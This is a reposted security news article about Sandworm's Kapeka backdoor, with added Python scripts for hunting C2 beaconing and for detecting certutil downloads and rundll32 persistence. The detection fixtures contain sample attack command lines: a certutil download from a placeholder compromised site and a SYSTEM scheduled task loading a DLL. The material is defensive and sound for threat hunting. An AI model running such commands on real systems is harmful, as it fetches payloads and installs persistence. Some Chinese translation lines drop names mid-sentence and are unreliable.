Russian APT Deploys New 'Kapeka' Backdoor in Eastern European Attacks

admin, 2024-04-19 02:59:38


A previously undocumented "flexible" backdoor called Kapeka has been "sporadically" observed in cyber attacks targeting Eastern Europe, including Estonia and Ukraine, since at least mid-2022.


The findings come from Finnish cybersecurity firm WithSecure, which attributed the malware to the Russia-linked advanced persistent threat (APT) group tracked as Sandworm (aka APT44 or Seashell Blizzard). Microsoft is tracking the same malware under the name KnuckleTouch.


"The malware [...] is a flexible backdoor with all the necessary functionalities to serve as an early-stage toolkit for its operators, and also to provide long-term access to the victim estate," security researcher Mohammad Kazem Hassan Nejad said.

"这种恶意软件[...]是一种灵活的后门,具有所有必要的功能,可以作为其运营商的早期工具包,还可以为受害者总部提供长期访问权。"安全研究员Mohammad Kazem Hassan Nejad说。

Kapeka comes fitted with a dropper that is designed to launch and execute the backdoor component on the infected host, after which it removes itself. The dropper is also responsible for setting up persistence for the backdoor, either as a scheduled task or as an autorun registry entry, depending on whether the process has SYSTEM privileges.


Microsoft, in its own advisory released in February 2024, described Kapeka as having been involved in multiple campaigns distributing ransomware, and said it can be used to carry out a variety of functions, such as stealing credentials and other data, conducting destructive attacks, and granting threat actors remote access to the device.


The backdoor is a Windows DLL written in C++ and features an embedded command-and-control (C2) configuration that's used to establish contact with an actor-controlled server and holds information about the frequency at which the server needs to be polled in order to retrieve commands.


Besides masquerading as a Microsoft Word add-in to make it appear genuine, the backdoor DLL gathers information about the compromised host and implements multi-threading to fetch incoming instructions, process them, and exfiltrate the results of the execution to the C2 server.



"The backdoor uses WinHttp 5.1 COM interface (winhttpcom.dll) to implement its network communication component," Nejad explained. "The backdoor communicates with its C2 to poll for tasks and to send back fingerprinted information and task results. The backdoor utilizes JSON to send and receive information from its C2."

"后门使用WinHttp 5.1 COM接口(winhttpcom.dll)来实现其网络通信组件,"Nejad解释说。"后门与其C2通信以轮询任务并将指纹信息和任务结果发送回。后门利用JSON从其C2发送和接收信息。"

The implant is also capable of updating its C2 configuration on-the-fly by receiving a new version from the C2 server during polling. Some of the main features of the backdoor allow it to read and write files from and to disk, launch payloads, execute shell commands, and even upgrade and uninstall itself.

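The polling behaviour described above lends itself to a network-side hunt: the implant contacts its C2 at the interval held in its embedded configuration, and that interval can change the moment the C2 pushes a new configuration. The script below is an added example of such a hunt, not code from the original article, WithSecure or Microsoft. It segments inter-arrival gaps into stable runs instead of testing one global variance, so a beacon that switches from one interval to another is reported as two periodic phases rather than dismissed as noise; the log lines and the hosts in them are constructed.

```python
"""Beacon-interval hunt over connection logs. Added example: not WithSecure's,
Microsoft's or Kapeka's code. The log lines are constructed and the hosts
in them are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import median


def parse_log(lines):
    """'<ISO-8601 time> <src> <dst>' -> {(src, dst): [epoch seconds, sorted]}."""
    conns = defaultdict(list)
    for line in lines:
        ts, src, dst = line.split()
        conns[(src, dst)].append(datetime.fromisoformat(ts).timestamp())
    return {pair: sorted(t) for pair, t in conns.items()}


def stable_runs(deltas, tolerance=0.2, min_len=4):
    """Split inter-arrival gaps into maximal runs in which every gap stays within
    `tolerance` of the run's median. Returns [(start, length, median_gap)] for
    runs of at least min_len gaps. Segmenting, rather than testing the variance
    of all gaps at once, keeps a polling interval that changes mid-stream
    (a pushed C2 config update) visible as two runs instead of as noise."""
    runs, i = [], 0
    while i < len(deltas):
        j = i + 1
        while j < len(deltas):
            med = median(deltas[i:j + 1])
            if abs(deltas[j] - med) > tolerance * med:
                break
            j += 1
        if j - i >= min_len:
            runs.append((i, j - i, median(deltas[i:j])))
        i = j
    return runs


def find_beacons(conns, **kw):
    """{(src, dst): [(interval_seconds, gaps_in_run), ...]} for periodic pairs."""
    found = {}
    for pair, times in conns.items():
        deltas = [b - a for a, b in zip(times, times[1:])]
        runs = stable_runs(deltas, **kw)
        if runs:
            found[pair] = [(round(med), length) for _, length, med in runs]
    return found


def constructed_log():
    """Constructed sample. Pair 1 polls every ~60 s with jitter, then every ~300 s
    after (hypothetically) receiving a new config; pair 2 is irregular noise."""
    base = datetime(2024, 4, 18, 9, 0, tzinfo=timezone.utc)

    def stamp(off):
        return (base + timedelta(seconds=off)).isoformat()

    lines = [f"{stamp(o)} 10.0.0.5 203.0.113.10"
             for o in (0, 58, 121, 179, 242, 300, 605, 903, 1210, 1498, 1800, 2095)]
    lines += [f"{stamp(o)} 10.0.0.7 198.51.100.20"
              for o in (0, 17, 140, 155, 400, 412, 900)]
    return lines


if __name__ == "__main__":
    for pair, runs in find_beacons(parse_log(constructed_log())).items():
        print(pair, runs)  # expected: ('10.0.0.5', '203.0.113.10') [(58, 5), (300, 6)]
```

A single variance check over all gaps scores the first pair as irregular because the 60-second and 300-second phases blur together; the segmented result reports both intervals, which is exactly the trace an operator-pushed polling change leaves in proxy or flow logs. The 20 percent tolerance absorbs the jitter implants commonly add; tune it and min_len against your own baseline before alerting on it.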

The exact method through which the malware is propagated is currently unknown. However, Microsoft noted that the dropper is retrieved from compromised websites using the certutil utility, underscoring the use of a legitimate living-off-the-land binary (LOLBin) to orchestrate the attack.

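Two of the behaviours on this page leave host-side traces that are straightforward to hunt for: the dropper registering persistence as a scheduled task or as an autorun Run-key entry (described earlier), and certutil being used as the download LOLBin. The script below is an added example; it is not WithSecure's or Microsoft's code and does not reproduce Kapeka's actual command lines. It runs three rules over constructed Sysmon-style events (EID 1 process creation, EID 13 registry value set); the task name, DLL paths, hosts and URL in the samples are illustrative assumptions.

```python
"""Host-side hunting rules for certutil downloads and rundll32 persistence.
Added example: not Kapeka's, WithSecure's or Microsoft's code. Events are
constructed Sysmon-style samples; names and paths are assumptions."""
import re
import shlex
from dataclasses import dataclass

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)


@dataclass
class Event:
    """Subset of Sysmon fields: EID 1 = process create, EID 13 = registry value set."""
    event_id: int
    image: str = ""      # EID 1: process image path
    cmdline: str = ""    # EID 1: full command line
    target: str = ""     # EID 13: registry value path
    details: str = ""    # EID 13: data written to the value


def tokens(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes.
    posix=False keeps backslashes literal; '/switch' is normalised to '-switch'."""
    out = []
    for tok in shlex.split(cmdline, posix=False):
        tok = tok.strip('"')
        out.append("-" + tok[1:] if tok.startswith("/") else tok)
    return out


def certutil_download(ev):
    """certutil fetching a remote file: -urlcache together with a URL argument
    (the documented download idiom is 'certutil -urlcache -split -f <url> <file>')."""
    if ev.event_id != 1 or not ev.image.lower().endswith("\\certutil.exe"):
        return False
    toks = [t.lower() for t in tokens(ev.cmdline)]
    return "-urlcache" in toks and any(URL_RE.fullmatch(t) for t in toks)


def scheduled_task_persistence(ev):
    """schtasks /create whose /tr action loads a module through rundll32."""
    if ev.event_id != 1 or not ev.image.lower().endswith("\\schtasks.exe"):
        return False
    low = [t.lower() for t in tokens(ev.cmdline)]
    if "-create" not in low or "-tr" not in low or low.index("-tr") + 1 >= len(low):
        return False
    return "rundll32" in low[low.index("-tr") + 1]


def run_key_persistence(ev):
    """Registry value set under a Run/RunOnce key whose data invokes rundll32.
    Both HKU/HKCU and HKLM are in scope: a non-elevated process can only write
    the user hive, an elevated one can write either."""
    if ev.event_id != 13 or not RUN_KEY_RE.search(ev.target):
        return False
    return "rundll32" in ev.details.lower()


RULES = {
    "certutil_download": certutil_download,
    "schtasks_rundll32_persistence": scheduled_task_persistence,
    "runkey_rundll32_persistence": run_key_persistence,
}


def hunt(events):
    """Return (rule, event_index) pairs for every event that matches a rule."""
    return [(name, i) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


SAMPLE_EVENTS = [  # constructed, not captured from any real incident
    Event(1, image=r"C:\Windows\System32\certutil.exe",
          cmdline=r"certutil.exe -urlcache -split -f http://compromised-site.invalid/d.bin C:\ProgramData\d.bin"),
    Event(1, image=r"C:\Windows\System32\certutil.exe",          # benign control
          cmdline=r"certutil.exe -hashfile C:\Users\alice\Downloads\setup.exe SHA256"),
    Event(1, image=r"C:\Windows\System32\schtasks.exe",
          cmdline=r'schtasks.exe /create /tn "Update Service" /tr "rundll32.exe C:\ProgramData\wwlib.dll,#1" /sc onstart /ru SYSTEM /f'),
    Event(13, target=r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Update Service",
          details=r"rundll32.exe C:\Users\alice\AppData\Local\wwlib.dll,#1"),
    Event(13, target=r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",  # benign control
          details=r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"),
]

if __name__ == "__main__":
    for rule, idx in hunt(SAMPLE_EVENTS):
        print(f"{rule}: event {idx}")
```

The -urlcache/-split/-f combination is certutil's documented way of fetching and caching a URL and is the form most often abused for downloads, so the benign -hashfile invocation is left in as a control. Because which persistence method the dropper chooses depends on its privileges, a hunt needs both the schtasks rule and the Run-key rule; rundll32 is only one way a DLL can be launched from either, so treat these rules as a starting point rather than a complete signature.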

Kapeka's connections to Sandworm come from conceptual and configuration overlaps with previously disclosed families such as GreyEnergy, a likely successor to the BlackEnergy toolkit, and Prestige.


"It is likely that Kapeka was used in intrusions that led to the deployment of Prestige ransomware in late 2022," WithSecure said. "It is probable that Kapeka is a successor to GreyEnergy, which itself was likely a replacement for BlackEnergy in Sandworm's arsenal."

"有可能Kapeka在导致2022年末部署的入侵中被使用。"WithSecure表示。"Kapeka很可能是的后继者,而本身很可能是在Sandworm的武器库中的替代品。"

"The backdoor's victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin."

"后门的受害者学、罕见的目击和隐蔽和复杂程度表明APT级别的活动,高度可能是俄罗斯起源的。"

References

[1] https://thehackernews.com/2024/04/russian-apt-deploys-new-kapeka-backdoor.html


Originally published by the WeChat public account 知机安全 under the title: Russian APT Deploys New 'Kapeka' Backdoor in Eastern European Attacks

Reposted by CN-SEC (credit to the original author); please keep this link when reproducing: https://cn-sec.com/archives/2669323.html
